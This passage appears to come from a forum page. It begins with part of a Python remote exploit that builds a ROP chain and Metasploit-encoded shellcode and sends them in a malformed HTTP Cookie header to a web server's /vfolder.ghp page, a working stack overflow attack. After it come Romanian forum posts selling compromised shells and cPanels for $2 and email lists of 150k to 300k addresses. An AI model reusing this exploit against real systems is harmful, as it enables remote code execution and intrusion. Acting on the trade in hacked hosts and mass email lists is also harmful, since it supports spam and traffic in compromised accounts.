[ImageLoad.dll] # The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('<L',0x1001D8C8) junk1="\x90" * 280 ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll] # Since 0x00 would break the exploit, the 0x00457452 (JMP ESP [fmws.exe]) needs to be crafted on the stack crafted_jmp_esp=pack('<L',0xA445ABCF) test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll] kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll] nopsled="\x90" * 20 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + "\xa5\x59\x50") payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode buf="GET /vfolder.ghp HTTP/1.1\r\n" buf+="User-Agent: Mozilla/4.0\r\n" buf+="Host:" + host + ":" + str(port) + "\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buf+="Accept-Language: en-us\r\n" buf+="Accept-Encoding: gzip, deflate\r\n" buf+="Referer: http://" + host + "/\r\n" buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n" buf+="Conection: Keep-Alive\r\n\r\n" print "[*] Connecting to Host " + host + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((host, port)) print "[*] Connected to " + host + "!" except: print "[!] " + host + " didn't respond\n" sys.exit(0) print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent!\n" s.close() source
  20. Salut, da am si ceva Ro. Da-mi un pm cand intri. -- Shells / cPanels - $2
  21. Da, da-mi un buzz cand esti. -- + 150k mailuri "amestecate" (yahoo, hotmail, aol, etc.)
  22. Reckon, nu te-am obligat sa cumperi de la mine, ia-ti de la rusi p.s: Parca era o regula, care interzice bagarea in seama la categoria market. -- + 300k Hotmail
×
×
  • Create New...